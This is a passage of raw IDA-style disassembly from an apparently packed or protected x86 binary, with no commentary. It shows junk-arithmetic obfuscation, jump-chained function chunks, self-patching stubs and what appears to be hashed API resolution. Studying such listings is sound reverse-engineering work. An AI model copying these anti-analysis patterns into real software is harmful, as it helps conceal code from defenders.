; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44403F:				; CODE XREF: sub_43CCD0:loc_4431D6j
		pop	ebp
		rol	eax, 19h
		and	eax, 0EDD3342Dh
		xor	eax, 78E14E7Eh
		push	eax
		pushf
		jmp	loc_449144
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_444056:				; CODE XREF: sub_453347:loc_45336Aj
		push	1D3C4055h
		pop	edx
		sub	edx, 628A2E4Bh
		or	edx, 18FDA634h
		rol	edx, 0Dh
		xor	edx, 6EC85C1Fh
		jnz	loc_443140

loc_444077:				; CODE XREF: sub_4424CF:loc_452377j
		jz	loc_45AAE1
		jmp	loc_44612C
; END OF FUNCTION CHUNK	FOR sub_453347
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_529. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454CE9

loc_444083:				; CODE XREF: sub_454CE9-10BAAj
		jmp	sub_43E135
; END OF FUNCTION CHUNK	FOR sub_454CE9
; ---------------------------------------------------------------------------

loc_444088:				; CODE XREF: k2vbe3.d:0044637Dj
		jnz	sub_44E8E0
		push	ecx
		jmp	sub_44BECA
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_444095:				; CODE XREF: sub_45530F+Cj
		jmp	loc_43C4B1
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------
		dw 0C1C4h
dword_44409C	dd 0			; DATA XREF: sub_457D4B:loc_443554r
					; sub_44D0D5-4733w
; ---------------------------------------------------------------------------

loc_4440A0:				; CODE XREF: k2vbe3.d:004416E0j
		jmp	loc_45BC2A

; =============== S U B	R O U T	I N E =======================================



sub_4440A5	proc near		; CODE XREF: sub_41AAD0+299p
					; sub_4440A5+5j
					; DATA XREF: ...
		call	sub_4440B5
		jmp	ds:off_41E030
sub_4440A5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_4440B0:				; CODE XREF: sub_451EB7-2FC9j
		jmp	loc_44C766
; END OF FUNCTION CHUNK	FOR sub_451EB7

; =============== S U B	R O U T	I N E =======================================



sub_4440B5	proc near		; CODE XREF: sub_43CCC8+3j
					; sub_441AE3:loc_441AF9j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00446447 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EA1A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450A5E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00452C2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C78 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00452E7F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453DCF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453E29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045703E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004599D4 SIZE 0000001A BYTES

		xchg	ecx, [esp+0]
		jmp	loc_44EA1A
sub_4440B5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	ebp, edx
		or	edi, 0FDD745F3h
		jmp	sub_446478

; =============== S U B	R O U T	I N E =======================================



sub_4440CA	proc near		; CODE XREF: k2vbe3.d:0044DF8Bj
					; k2vbe3.d:00458683p

; FUNCTION CHUNK AT 004409A1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445F11 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447757 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B885 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453D18 SIZE 00000014 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jmp	loc_447757
sub_4440CA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4440DA	proc near		; CODE XREF: sub_406424+77p
					; sub_4064D4+52p ...
		call	sub_4440E5
		jmp	ds:off_41E154
sub_4440DA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4440E5	proc near		; CODE XREF: sub_4440DAp sub_447D8B+7j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E395 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043E80A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EBDD SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00443E86 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004443AC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444871 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044505B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B621 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BAC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454DEA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455985 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456B81 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00456F52 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00457C8A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AC30 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B19D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B467 SIZE 00000005 BYTES

		call	sub_449661

loc_4440EA:				; CODE XREF: sub_457DCA:loc_4469DCj
		jnz	loc_43E396
		jmp	loc_44505B
sub_4440E5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_4440F5:				; CODE XREF: sub_44F028:loc_443677j
		push	0A808AD5h
		pop	ebx
		and	ebx, 0AE12396Dh
		add	ebx, 12D5F9C1h
		call	sub_452DD6
; END OF FUNCTION CHUNK	FOR sub_44F028
; START	OF FUNCTION CHUNK FOR sub_44B58F

loc_44410C:				; CODE XREF: sub_44B58F-C712j
		jmp	loc_454115
; END OF FUNCTION CHUNK	FOR sub_44B58F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_444111:				; CODE XREF: sub_451CF1-1C92j
		jnz	loc_43DEAA
		not	ebx
		jmp	loc_442EEE
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------
		cmp	ebx, 152285E0h
		jmp	loc_43F778
; ---------------------------------------------------------------------------
		popf
		jmp	sub_458B3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454CE9

loc_44412F:				; CODE XREF: sub_454CE9:loc_451AFEj
		pop	edi
		or	edi, 16DB1816h
		add	edi, 0C0645CF1h
		xchg	edi, [esp+8+var_8]
		jmp	loc_444083
; END OF FUNCTION CHUNK	FOR sub_454CE9

; =============== S U B	R O U T	I N E =======================================



sub_444144	proc near		; DATA XREF: k2vbe3.d:00457C7Ao

; FUNCTION CHUNK AT 0043F1A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044606C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00448012 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448FBD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C68B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D2C4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044ECDB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045919D SIZE 0000000D BYTES

		ror	eax, 1Ch
		push	ecx
		push	15C30F90h
		pop	ecx
		add	ecx, ds:4000ECh
		test	ecx, 20000h
		jmp	loc_448012
sub_444144	endp

; ---------------------------------------------------------------------------
		xchg	ebx, [eax]
		popf
		jmp	sub_44C03F
; ---------------------------------------------------------------------------

loc_444167:				; CODE XREF: k2vbe3.d:00459F5Aj
		jz	loc_450EA7

; =============== S U B	R O U T	I N E =======================================



sub_44416D	proc near		; CODE XREF: sub_450359+A189p

; FUNCTION CHUNK AT 0043FCE6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044087D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044555B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00449DBA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044A3CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B1E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BCC2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D409 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004504CB SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00454452 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457B19 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045841B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045868E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459445 SIZE 0000000F BYTES

		xchg	esi, [esp+0]
		pop	esi
		jz	loc_44555B
		jmp	loc_45868E
sub_44416D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44417C:				; CODE XREF: sub_44B94B+18j
		add	eax, 63FDE1C6h
		add	eax, ebp
		add	eax, 0C0221C20h
		cmp	dword ptr [eax], 47424454h
		jmp	loc_440CE5
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E059

loc_444195:				; CODE XREF: sub_44E059+Cj
		jnz	loc_45571B
		jmp	loc_450A25
; END OF FUNCTION CHUNK	FOR sub_44E059
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_4441A0:				; CODE XREF: sub_45AD42:loc_4455E9j
		jnz	loc_447202
		jmp	loc_44BB32
; END OF FUNCTION CHUNK	FOR sub_45AD42
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_429. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_4441AC:				; CODE XREF: k2vbe3.d:0044D852j
					; sub_44945C+4A38j
		jmp	loc_449385
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_4441B1:				; CODE XREF: sub_44E00F-EE7Ej
		jmp	loc_44B02D
; END OF FUNCTION CHUNK	FOR sub_44E00F
; ---------------------------------------------------------------------------

loc_4441B6:				; CODE XREF: k2vbe3.d:00452005j
		or	ecx, 28465D93h
		xor	ecx, 6C1730F2h
		add	ecx, 0FF636D9Dh
		xchg	ecx, [esp]
		jmp	sub_44ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4441D0:				; CODE XREF: sub_45A323-D673j
		push	0ACB444E6h
		pop	edx
		sub	edx, 9A6CB1DBh
		xor	edx, 0FF302142h
		test	edx, 4000h
		jmp	loc_451CFD
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4441ED:				; CODE XREF: sub_457D4B:loc_458ED8j
		call	sub_456C15

loc_4441F2:				; CODE XREF: k2vbe3.d:0044EDFBj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA01

loc_4441F7:				; CODE XREF: sub_43DA01+5j
		jmp	nullsub_32
; END OF FUNCTION CHUNK	FOR sub_43DA01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_4441FC:				; CODE XREF: sub_4575BD:loc_44BD2Cj
		neg	eax
		sbb	eax, eax
		neg	eax
		push	edx
		push	0A8EB7FECh
		pop	edx
		or	edx, 1630DB18h
		cmp	edx, 3532F3FDh
		jmp	loc_44AA57
; END OF FUNCTION CHUNK	FOR sub_4575BD
; ---------------------------------------------------------------------------
byte_44421A	db 90h			; DATA XREF: k2vbe3.d:004494D4o
; ---------------------------------------------------------------------------

loc_44421B:				; CODE XREF: k2vbe3.d:00445F39j
		mov	eax, [esp]
		call	sub_453347
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_444224:				; CODE XREF: sub_450F71:loc_44F5BEj
		push	offset sub_44C297
		jmp	nullsub_196
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------

loc_44422E:				; CODE XREF: k2vbe3.d:0044B0C9j
		rol	esi, 1Bh

; =============== S U B	R O U T	I N E =======================================



sub_444231	proc near		; CODE XREF: sub_447E07:loc_4486FDp

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	edi, [esp-4+arg_0]
		mov	eax, edi
		pop	edi
		jmp	nullsub_33
sub_444231	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_444240:				; CODE XREF: sub_44866A+EA51j
		cmp	eax, 16E5051Ch
		jmp	loc_442D42
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------

loc_44424B:				; CODE XREF: k2vbe3.d:00454B16j
		jg	loc_45279C
		or	edx, 486AF5D3h
		ror	ebp, 1Fh
		shl	ecx, 5
		jmp	loc_459E6C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_360. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_444263:				; CODE XREF: sub_4529E2+10j
		jmp	loc_44676A
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------

loc_444268:				; CODE XREF: k2vbe3.d:0044E76Ej
		xor	edx, 5FD9BA93h
		cmp	edx, 0D7BDC627h
		jmp	loc_456C6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_444279:				; CODE XREF: sub_45A323-901Cj
					; sub_45A323:loc_45A34Aj
		push	9CEAEB69h
		pop	eax
		xor	eax, 1E95724Eh
		add	eax, 0D3E42EAh
		add	eax, ebp
		call	sub_441C24

loc_444292:				; CODE XREF: k2vbe3.d:00440538j
		jmp	loc_44CCA9
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_444297	proc near		; CODE XREF: k2vbe3.d:00443AFBj
					; sub_45634D-93A0p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F533 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440F60 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442405 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444816 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447C61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AED6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004536BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455222 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004585B8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004592EE SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0045A702 SIZE 00000011 BYTES

		xchg	edi, [esp+4+var_4]
		pop	edi
		push	esi
		mov	esi, eax
		jmp	loc_447C61
sub_444297	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4442A3:				; CODE XREF: k2vbe3.d:00456B02j
		lea	eax, nullsub_505
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_505
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp]
		push	edx
		jmp	loc_4595F2
; ---------------------------------------------------------------------------

loc_4442C0:				; CODE XREF: k2vbe3.d:loc_455A88j
		mov	edx, [ebp-20h]
		shr	edx, 3
		push	0C1493085h
		pop	ecx
		jmp	loc_449ED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_4442D1:				; CODE XREF: sub_43E470+1B629j
		push	1D9FA136h
; END OF FUNCTION CHUNK	FOR sub_43E470
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_4442D6:				; CODE XREF: sub_4534C2-D4C7j
		pop	esi
		or	esi, 42A2304Dh
		rol	esi, 1
		jmp	loc_45965B
; END OF FUNCTION CHUNK	FOR sub_4534C2
; ---------------------------------------------------------------------------

loc_4442E4:				; CODE XREF: k2vbe3.d:00459836j
		adc	edx, 3782ACDAh
		mov	eax, ebp
		mov	[ebp+0], ecx
		ror	edx, 1Ch
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4442F2:				; CODE XREF: sub_44C90E:loc_45982Aj
		xor	eax, 9BF6BE2Eh
		add	eax, ebp
		jmp	loc_45A336
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_4442FF:				; CODE XREF: sub_448D7F:loc_4491E6j
		push	edx
		push	edx
		call	sub_4589FD

loc_444306:				; CODE XREF: sub_447E07+774Bj
		jmp	loc_45A0E8
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_44430B:				; CODE XREF: sub_4590BA-F3CFj
		jmp	nullsub_305
; END OF FUNCTION CHUNK	FOR sub_4590BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_444310:				; CODE XREF: sub_452D37:loc_454A39j
		jz	loc_452BC1

loc_444316:				; CODE XREF: k2vbe3.d:00452673j
		jmp	loc_453A46
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_44431B:				; CODE XREF: sub_455C7A-EDAAj
		jmp	loc_459F1F
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
		push	0F9A30227h
		jmp	loc_452BB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D244

loc_44432A:				; CODE XREF: sub_43D244+9j
		pop	ebx
		sub	ebx, 771E5E08h
		add	ebx, 65925112h
		xchg	ebx, [esp+4+var_4]
		lea	eax, [ebp-20h]
		push	eax
		call	sub_444DA9
		push	ebx
		jmp	loc_44E56C
; END OF FUNCTION CHUNK	FOR sub_43D244
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_444349:				; CODE XREF: sub_4506C3:loc_43D1E3j
					; sub_4506C3+1F53j
		push	0C4114EEBh
		pop	eax
		rol	eax, 0Fh
		xor	eax, ds:4000F3h
		jmp	loc_4562C5
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_44435D:				; CODE XREF: sub_44DB59+1E87j
		mov	ecx, esi
		pop	esi
		pop	ebx
		pop	edx
		pop	ebp
		jmp	loc_446EF8
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BF9

loc_444368:				; CODE XREF: sub_454BF9-13CCFj
		push	edi
		push	edx
		pop	edi
		xchg	edi, [esp+4+var_4]
		call	sub_44E481
		jmp	loc_451631
; END OF FUNCTION CHUNK	FOR sub_454BF9
; ---------------------------------------------------------------------------
		mov	eax, 5AB1337Ah
		call	sub_4553CC
		push	offset sub_44811E
		jmp	locret_43F4A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3C0

loc_44438C:				; CODE XREF: sub_44B3C0:loc_45178Bj
		xor	ecx, 727F0297h
		or	ecx, 1BD86673h
		and	ecx, 41BA4EFFh
		rol	ecx, 1Ch
		jmp	loc_447B0A
; END OF FUNCTION CHUNK	FOR sub_44B3C0
; ---------------------------------------------------------------------------

loc_4443A6:				; CODE XREF: k2vbe3.d:0044F426j
		xor	edx, 2B408EE8h
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_4443AC:				; CODE XREF: sub_4440E5+12E85j
		add	eax, 2969359Fh
		xchg	eax, [esp-4+arg_0]
		jmp	sub_43C04E
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_4443BA:				; CODE XREF: sub_44128B-2E20j
		push	0C816E560h
		jmp	loc_45612C
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4502BA

loc_4443C4:				; CODE XREF: sub_4502BA:loc_45AF76j
		add	eax, 0BDDA26FFh
		rol	eax, 0Ch
		and	eax, 6C751D5Ah
		push	offset loc_44ED5B
		jmp	nullsub_403
; END OF FUNCTION CHUNK	FOR sub_4502BA

; =============== S U B	R O U T	I N E =======================================



sub_4443DD	proc near		; CODE XREF: sub_43C82E:loc_43F31Cj
					; sub_43C82E+11C16j

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F2C7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440CD3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044229C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449B3E SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044C7C5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450116 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450EC6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045176A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459267 SIZE 00000014 BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		lea	eax, loc_451743+1
		push	ebp
		jmp	loc_43F2C7
sub_4443DD	endp

; ---------------------------------------------------------------------------
		and	esi, edi
		jmp	loc_45BCEE
; ---------------------------------------------------------------------------

loc_4443F6:				; CODE XREF: k2vbe3.d:loc_44B538j
		jl	loc_43F333
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_4443FC:				; CODE XREF: sub_44BDBB-A364j
		jmp	loc_454A7D
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
		adc	edx, 61DBD6B9h
		xchg	edi, [edx]
		sub	ecx, 96AABDB1h
		jmp	loc_43D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_444414:				; CODE XREF: sub_457DCA-1E26j
		push	eax
		pop	edi
		xchg	edi, [esp-4+arg_0]
		call	dword ptr [ebp-4]
		test	eax, eax

loc_44441E:				; CODE XREF: k2vbe3.d:loc_44EA96j
		jl	loc_440F45
		jmp	loc_4565A3
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------

loc_444429:				; CODE XREF: k2vbe3.d:004595FDj
		and	edx, ebx
		jmp	loc_4420B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_444430:				; CODE XREF: sub_447692:loc_44A3D8j
		jnb	loc_442CB5
		sbb	edx, eax
		jmp	loc_442CB3
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_44443D:				; CODE XREF: sub_456541-8C03j
		jnz	loc_45131D
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 4
		mov	eax, [ebp-4]
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+8]
		mov	[edx-18h], eax
; END OF FUNCTION CHUNK	FOR sub_456541
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_444456:				; CODE XREF: sub_44A1B1+3784j
		inc	dword ptr [ebp-4]
		jmp	loc_4494AF
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------

loc_44445E:				; CODE XREF: k2vbe3.d:0044FCF5j
		sub	ebp, 0B420C35Ah
		pop	edx

loc_444465:				; CODE XREF: k2vbe3.d:loc_43E628j
		push	eax
		push	offset sub_45370B
		jmp	locret_44967F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_444470:				; CODE XREF: sub_4582DD:loc_4599A5j
		rol	eax, 13h
		mov	edx, edi
		xchg	esi, [ecx]
		jmp	loc_45AAFC
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------

loc_44447C:				; CODE XREF: k2vbe3.d:loc_44DA4Dj
		xchg	eax, [esp]
		call	sub_44E481
		mov	eax, 4C5D3995h
		call	sub_4553CC
		mov	ds:dword_41E148, eax
		push	offset sub_450C26
		jmp	loc_44A0A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_44449E:				; CODE XREF: sub_449067+F498j
		pop	ecx
		rol	ecx, 1Dh
		add	ecx, 79D015E9h
		xchg	ecx, [esp+8+var_8]
		jmp	sub_455F6B
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481DC

loc_4444B0:				; CODE XREF: sub_4481DC+19j
		mov	eax, [ebp-8]
		mov	byte ptr [eax],	0
		mov	esp, ebp
		pop	ebp
		jmp	loc_44F22D
; END OF FUNCTION CHUNK	FOR sub_4481DC
; ---------------------------------------------------------------------------

loc_4444BE:				; CODE XREF: k2vbe3.d:00454D3Bj
		jnz	loc_4420EF
		jmp	loc_444A01
; ---------------------------------------------------------------------------

loc_4444C9:				; CODE XREF: k2vbe3.d:00458B63j
					; k2vbe3.d:00458B75j
		add	esi, 3F41D7F6h
		mov	[esi], eax
		pop	esi
		push	offset loc_445E8D
		jmp	loc_45BC1A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4444DC:				; CODE XREF: sub_44B2D7-C4BFj
		push	offset sub_44B194
		jmp	nullsub_118
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------

loc_4444E6:				; CODE XREF: k2vbe3.d:004423F0j
		jnp	loc_45A0B0

; =============== S U B	R O U T	I N E =======================================



sub_4444EC	proc near		; CODE XREF: k2vbe3.d:loc_44B094p

; FUNCTION CHUNK AT 0044FF75 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004505B5 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	edx, 0B5399D4Bh
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_227
		jmp	loc_44FF75
sub_4444EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_444504:				; CODE XREF: sub_450F71-EED1j
		jl	loc_45BADD
		cdq
		and	edx, 1C4F208Ah
		xchg	eax, ecx
		xchg	ebp, [ecx]
		jmp	loc_44CF88
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		or	eax, 0D64A4CFCh
		jmp	loc_45C03B
; ---------------------------------------------------------------------------

loc_444525:				; CODE XREF: k2vbe3.d:0044FF70j
		add	ecx, 0E7D8A885h
		mov	[ecx], eax
		pop	ecx
		jmp	locret_44211A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459382

loc_444533:				; CODE XREF: sub_459382j
		call	sub_4465B1

loc_444538:				; CODE XREF: sub_4423D2+1277Fj
		jmp	nullsub_325
; END OF FUNCTION CHUNK	FOR sub_459382
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_44453D:				; CODE XREF: sub_44EEFE+6j
		jmp	loc_450963
; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_444542:				; CODE XREF: sub_44DCF5-395Dj
		jz	loc_455177
		jmp	loc_44D40E
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E388

loc_44454D:				; CODE XREF: sub_44E388:loc_457D0Cj
		add	eax, 9DE755BCh
		push	offset loc_44C43C
		jmp	loc_456D51
; END OF FUNCTION CHUNK	FOR sub_44E388
; ---------------------------------------------------------------------------

loc_44455D:				; CODE XREF: k2vbe3.d:0043CC65j
		sub	eax, esi

; =============== S U B	R O U T	I N E =======================================



sub_44455F	proc near		; CODE XREF: k2vbe3.d:00457CECp

; FUNCTION CHUNK AT 004474B9 SIZE 00000006 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		rol	eax, 0Eh
		sub	eax, 6EE1E0A5h
		jmp	loc_4474B9
sub_44455F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_41E194, eax
		lea	eax, nullsub_116
		mov	byte ptr [eax],	0C3h
		jmp	loc_457099

; =============== S U B	R O U T	I N E =======================================



sub_444585	proc near		; CODE XREF: sub_4033CB+BEp
					; sub_404C4E+D9p ...
		call	sub_448380
		jmp	ds:off_41E198
sub_444585	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B6EC

loc_444590:				; CODE XREF: sub_44B6EC+9j
		jmp	loc_44A840
; END OF FUNCTION CHUNK	FOR sub_44B6EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_444595:				; CODE XREF: sub_44A79B-525Fj
		jmp	loc_44E253
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
